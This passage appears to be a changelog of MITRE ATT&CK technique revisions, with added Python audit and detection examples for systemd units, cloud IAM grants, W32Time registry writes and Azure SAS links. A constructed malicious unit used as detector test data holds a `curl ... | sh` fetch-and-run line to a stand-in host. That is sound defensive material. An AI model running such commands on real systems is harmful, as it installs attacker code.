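        os.symlink(os.path.join(payload_dir, "x.service"), os.path.join(d, "evil.service"))
        os.symlink("/dev/null", os.path.join(d, "masked.service"))
        return [name for name, _ in symlinked_units(d)]


# Constructed: a tampered system unit of the kind the description covers.
TAMPERED_UNIT = """\
[Unit]
Description=System Update Helper
After=network.target

[Service]
Type=simple
ExecStartPre=-/usr/bin/mkdir -p /var/lib/helper
ExecStart=/tmp/.cache/helper --daemon
ExecReload=/bin/sh -c 'curl -s http://198.51.100.7/u | sh'
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Constructed: an ordinary unit that should produce no findings.
BENIGN_UNIT = """\
[Service]
User=www-data
ExecStart=/usr/sbin/nginx -g 'daemon off;'
ExecReload=/bin/kill -s HUP $MAINPID
"""

if __name__ == "__main__":
    for finding in audit_unit(TAMPERED_UNIT):
        print(*finding)
    print("benign:", audit_unit(BENIGN_UNIT), "symlinks:", symlink_check_demo())
```

On the tampered unit the audit reports `ExecStart` (payload under `/tmp`) and `ExecReload` (a `curl | sh` wrapper), both high because the unit has no `User=` and so runs as root; the leading `-` on `ExecStartPre` is correctly ignored and `/usr/bin/mkdir` passes. The benign unit yields nothing. To run it over a live host, call `audit_unit` on each file `symlinked_units` does not already flag under `/etc/systemd/system` and the per-user `~/.config/systemd/user` directories (passing `system_unit=False` for the latter).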

[T1548.005] Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Google Cloud Just in Time Access 2023)(Citation: Azure Just in Time Access 2023)

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.(Citation: Google Cloud Service Account Authentication Roles) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange)

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)

**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)

New Description
Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own.

Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023)

Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange)

Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles)

While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation)

**Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 17:38:56.602000+00:002024-03-28 15:30:09.313000+00:00
descriptionAdversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Google Cloud Just in Time Access 2023)(Citation: Azure Just in Time Access 2023) Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.(Citation: Google Cloud Service Account Authentication Roles) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. 
In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles) While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation) **Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. 
This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.(Citation: Azure Just in Time Access 2023) Account impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account, while service accounts with domain-wide delegation permission are permitted to impersonate Google Workspace accounts.(Citation: Google Cloud Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.(Citation: Microsoft Impersonation and EWS in Exchange) Many cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. 
In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.(Citation: AWS PassRole)(Citation: Google Cloud Service Account Authentication Roles) While users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.(Citation: Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS Privilege Escalation) **Note:** this technique is distinct from [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.(Citation: CrowdStrike StellarParticle January 2022)
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field / Old value / New value
external_references: {'source_name': 'Hunters Domain Wide Delegation Google Workspace 2023', 'description': 'Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.', 'url': 'https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover'}
external_references: {'source_name': 'Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023', 'description': "Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024.", 'url': 'https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/'}
x_mitre_platforms: Google Workspace
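
The updated description above names the grants that make temporary elevation and role-passing abusable when they are handed out too broadly: `iam:PassRole` without a resource or `iam:PassedToService` restriction in AWS, and project-wide `iam.serviceAccountTokenCreator` / `iam.serviceAccountUser` bindings in GCP. The following is an added audit example, not code from ATT&CK or the cited references: it walks an AWS identity policy and a GCP project binding list and reports the grants that create those escalation paths. The policy documents are constructed inline; the account ID, role names and members are hypothetical.

```python
import fnmatch
import json

# Constructed AWS identity-based policy; the account ID and role names are hypothetical.
AWS_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["ec2:RunInstances", "iam:PassRole"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::111122223333:role/app-runtime",
     "Condition": {"StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}}},
    {"Effect": "Allow", "Action": "sts:AssumeRole",
     "Resource": "arn:aws:iam::111122223333:role/Admin"}
  ]
}""")

# Constructed GCP project-level IAM policy bindings; the members are hypothetical.
GCP_BINDINGS = [
    {"role": "roles/iam.serviceAccountTokenCreator", "members": ["user:dev@example.com"]},
    {"role": "roles/iam.serviceAccountUser", "members": ["group:ops@example.com"]},
    {"role": "roles/viewer", "members": ["user:auditor@example.com"]},
]

# Roles that let a principal mint tokens for, attach, or key every service
# account within the scope of the binding.
GCP_IMPERSONATION_ROLES = {
    "roles/iam.serviceAccountTokenCreator",
    "roles/iam.serviceAccountUser",
    "roles/iam.serviceAccountKeyAdmin",
}


def _as_list(value):
    """IAM allows scalars or lists for Action/Resource; normalize to a list."""
    return value if isinstance(value, list) else [value]


def _grants(actions, wanted):
    """True if any action pattern (wildcards allowed, e.g. iam:*) covers `wanted`."""
    return any(fnmatch.fnmatchcase(wanted.lower(), pattern.lower()) for pattern in actions)


def find_passrole_risks(policy):
    """Statements that allow iam:PassRole on any role without an
    iam:PassedToService condition. A principal holding one can hand an
    arbitrary role to a resource it creates and then act through it."""
    findings = []
    for index, statement in enumerate(policy.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        if not _grants(_as_list(statement.get("Action", [])), "iam:PassRole"):
            continue
        resources = _as_list(statement.get("Resource", []))
        unrestricted = any(r == "*" or r.endswith(":role/*") for r in resources)
        condition = json.dumps(statement.get("Condition", {})).lower()
        if unrestricted and "iam:passedtoservice" not in condition:
            findings.append({"statement": index, "resource": resources})
    return findings


def find_gcp_impersonation_grants(bindings, scope="project"):
    """Impersonation-capable roles bound at project (or folder/org) scope,
    where they apply to every service account underneath rather than one."""
    return [
        {"scope": scope, "role": b["role"], "members": sorted(b["members"])}
        for b in bindings
        if b["role"] in GCP_IMPERSONATION_ROLES
    ]


if __name__ == "__main__":
    for f in find_passrole_risks(AWS_POLICY):
        print(f"AWS: unrestricted iam:PassRole in statement {f['statement']} on {f['resource']}")
    for g in find_gcp_impersonation_grants(GCP_BINDINGS):
        print(f"GCP: {g['role']} bound at {g['scope']} scope to {', '.join(g['members'])}")
```

Only the first AWS statement is reported: the second pins PassRole to one role and one service, which is the shape a least-privilege grant should take. The GCP check deliberately ignores bindings placed on an individual service account, since those are the intended way to scope impersonation.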

[T1547.003] Boot or Logon Autostart Execution: Time Providers

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)

New Description
Adversaries may abuse time providers to execute DLLs when the system boots.

The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
Details
values_changed
STIX Field / Old value / New value
modified: 2022-04-20 16:31:16.715000+00:00 → 2024-04-12 02:34:58.003000+00:00
description:
Old value: Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
New value: Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field / Old value / New value
x_mitre_contributors: Harun Küßner
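
The revised description pins the persistence write to a specific registry location: a new subkey under `W32Time\TimeProviders\` whose `DllName` value names the malicious DLL, plus `Enabled` set so the time provider manager loads it. The following is an added detection example, not code from ATT&CK or the cited references: it runs that rule over Sysmon Event ID 13 (registry value set) records and flags providers outside the stock set or DLL paths outside System32. The records are constructed inline in a simplified JSON form; field names follow Sysmon's, while the hosts, users and paths are hypothetical, and the list of default providers is an assumption about a stock Windows build.

```python
import json
import re

# Constructed Sysmon Event ID 13 records in simplified JSON, one per line;
# hosts, users and paths are hypothetical.
SAMPLE_LOG = r"""
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\LOCAL SERVICE", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpClient\\Enabled", "Details": "DWORD (0x00000001)"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\regedit.exe", "User": "CORP\\jdoe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\HealthProvider\\DllName", "Details": "C:\\Users\\Public\\health.dll"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\regedit.exe", "User": "CORP\\jdoe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\HealthProvider\\Enabled", "Details": "DWORD (0x00000001)"}
{"EventID": 13, "EventType": "SetValue", "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\\DllName", "Details": "C:\\Windows\\System32\\w32time.dll"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "User": "CORP\\jdoe"}
"""

# Providers shipped with Windows (assumption: the stock set on a client or
# Hyper-V guest); anything else under TimeProviders is worth a look.
KNOWN_PROVIDERS = {"ntpclient", "ntpserver", "vmictimeprovider"}
SYSTEM_DLL_DIRS = ("%systemroot%\\system32\\", "c:\\windows\\system32\\")

# Matches ...\W32Time\TimeProviders\<subkey>\DllName or \Enabled.
TP_VALUE_RE = re.compile(
    r"\\W32Time\\TimeProviders\\([^\\]+)\\(DllName|Enabled)$", re.IGNORECASE)


def find_time_provider_changes(log_text):
    """Return one finding per registry write that registers or enables a
    time provider outside the stock set, or points DllName outside System32."""
    findings = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        if event.get("EventID") != 13:
            continue
        match = TP_VALUE_RE.search(event.get("TargetObject", ""))
        if not match:
            continue
        provider, value_name = match.group(1), match.group(2)
        details = event.get("Details", "")
        known = provider.lower() in KNOWN_PROVIDERS
        reasons = []
        if value_name.lower() == "dllname":
            if not details.lower().startswith(SYSTEM_DLL_DIRS):
                reasons.append(f"DllName points outside System32: {details}")
            if not known:
                reasons.append(f"new time provider subkey {provider}")
        elif not known and not details.endswith("(0x00000000)"):
            reasons.append(f"non-default provider {provider} enabled")
        if reasons:
            findings.append({"provider": provider, "value": value_name,
                             "user": event.get("User"), "image": event.get("Image"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_time_provider_changes(SAMPLE_LOG):
        print(f"{f['user']} via {f['image']}: {f['provider']}\\{f['value']} - " + "; ".join(f["reasons"]))
```

The two stock writes by `svchost.exe` pass, and both writes to the new `HealthProvider` subkey are reported. Because the description notes that execution runs as Local Service even though registration needs administrator rights, the `User` on the write (an interactive admin rather than SYSTEM or the W32Time service itself) is the field worth surfacing first.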

[T1537] Transfer Data to Cloud Account

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)

New Description
Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.

A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.(Citation: TLDRSec AWS Attacks)

Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)

Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)

New Mitigations:

Dropped Mitigations:

New Detections:

Details
values_changed
STIX Field / Old value / New value
modified: 2022-06-16 19:21:04.897000+00:00 → 2024-04-11 15:53:00.577000+00:00
description:
Old value: Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces. Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
New value: Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service. A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.(Citation: TLDRSec AWS Attacks) Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature) Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4
iterable_item_added
STIX Field / Old value / New value
external_references: {'source_name': 'TLDRSec AWS Attacks', 'description': 'Clint Gibler and Scott Piper. (2021, January 4). Lesser Known Techniques for Attacking AWS Environments. Retrieved March 4, 2024.', 'url': 'https://tldrsec.com/p/blog-lesser-known-aws-attacks'}
external_references: {'source_name': 'Microsoft Azure Storage Shared Access Signature', 'description': 'Microsoft. (2023, June 7). Grant limited access to Azure Storage resources using shared access signatures (SAS). Retrieved March 4, 2024.', 'url': 'https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview'}
x_mitre_contributors: Gabriel Currie
x_mitre_data_sources: Application Log: Application Log Content
x_mitre_platforms: SaaS
x_mitre_platforms: Google Workspace
x_mitre_platforms: Office 365
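
The new wording adds Azure shared access signature (SAS) URIs as a cloud-native way to hand victim data to an adversary-controlled account, and the added data source (Application Log Content) is where such links surface. The following is an added triage example, not code from ATT&CK or the cited Microsoft documentation: it parses SAS URIs recovered from logs or tickets and scores the properties that turn one into a standing exfiltration channel (account-wide or container-wide scope, list and write permissions, long expiry, no source IP pin, plain HTTP allowed). The query parameter names are the documented SAS parameters; the storage account, paths, signatures, and the seven-day lifetime threshold are assumptions.

```python
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Reference "now" for the constructed samples below.
NOW = datetime(2024, 3, 4, 10, 30, tzinfo=timezone.utc)
MAX_LIFETIME = timedelta(days=7)  # assumption: local policy ceiling for SAS validity

# Constructed sample SAS URIs; storage account, paths and signatures are hypothetical.
SAMPLE_URIS = [
    # Service SAS: one blob, read only, one-hour window, HTTPS only, pinned to a source IP.
    "https://contoso.blob.core.windows.net/reports/q1.pdf?sv=2022-11-02&sr=b&sp=r"
    "&st=2024-03-04T10:00:00Z&se=2024-03-04T11:00:00Z&spr=https&sip=203.0.113.10&sig=AAAA",
    # Service SAS: whole container, read+list, valid for a year, no IP restriction.
    "https://contoso.blob.core.windows.net/backups?sv=2022-11-02&sr=c&sp=rl"
    "&se=2025-03-04T00:00:00Z&sig=BBBB",
    # Account SAS: every service and resource type, full permissions, long-lived.
    "https://contoso.blob.core.windows.net/?sv=2022-11-02&ss=bfqt&srt=sco&sp=rwdlacup"
    "&se=2024-12-31T23:59:59Z&sig=CCCC",
]


def assess_sas(uri, now=None):
    """Return (score, reasons) for one SAS URI; score is the number of
    properties that make the link useful as a standing exfiltration channel."""
    now = now or datetime.now(timezone.utc)
    params = {k: v[0] for k, v in parse_qs(urlsplit(uri).query).items()}
    perms = set(params.get("sp", ""))
    reasons = []
    # Scope: account SAS (ss/srt present) or container-wide service SAS (sr=c)
    if "ss" in params or "srt" in params:
        reasons.append(f"account SAS spanning services '{params.get('ss', '?')}'")
    elif params.get("sr") == "c":
        reasons.append("container-scoped SAS")
    if "l" in perms:
        reasons.append("list permission: holder can enumerate blobs")
    if perms & set("wdac"):
        reasons.append("write/delete/add/create permission: data can be pushed or destroyed")
    # Lifetime: se is required; a long window outlives any incident response
    expiry = params.get("se")
    if expiry:
        expires_at = datetime.strptime(expiry, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        if expires_at - now > MAX_LIFETIME:
            reasons.append(f"expiry {expiry} is more than {MAX_LIFETIME.days} days out")
    else:
        reasons.append("no expiry (se) parameter")
    # Network constraints: sip pins the caller; spr defaults to https,http when absent
    if "sip" not in params:
        reasons.append("no source IP restriction (sip)")
    if params.get("spr", "https,http") != "https":
        reasons.append("plain HTTP accepted (spr)")
    return len(reasons), reasons


def rank_sas(uris, now=None):
    """Order URIs from most to least useful to an adversary holding them."""
    scored = [(assess_sas(u, now)[0], u) for u in uris]
    return sorted(scored, key=lambda item: item[0], reverse=True)


if __name__ == "__main__":
    for score, uri in rank_sas(SAMPLE_URIS, NOW):
        print(score, uri.split("?", 1)[0])
        for reason in assess_sas(uri, NOW)[1]:
            print("   -", reason)
```

The short-lived, single-blob, IP-pinned link scores zero; the account SAS with `rwdlacup` and a nine-month expiry ranks first. The same scoring works on links pulled from Storage diagnostic logs, where the `sig` value is already redacted, since nothing here depends on the signature itself.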

[T1059.004] Command and Scripting Interpreter: Unix Shell

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field / Old value / New value
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
dictionary_item_removed
STIX Field / Old value / New value
x_mitre_permissions_required: ['User', 'root']
values_changed
STIX Field / Old value / New value
modified: 2021-07-26 22:34:43.261000+00:00 → 2024-04-16 12:24:40.163000+00:00
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field / Old value / New value
x_mitre_platforms: Network

[T1550] Use Alternate Authentication Material

Current version: 1.3

Version changed from: 1.2 → 1.3

New Mitigations:

Details
dictionary_item_added
STIX Field / Old value / New value
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors: ['Blake Strom, Microsoft Threat Intelligence']
x_mitre_deprecated: False
values_changed
STIX Field / Old value / New value
modified: 2022-04-01 12:57:34.058000+00:00 → 2024-04-12 21:18:23.798000+00:00
x_mitre_version: 1.2 → 1.3

[T1204] User Execution

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

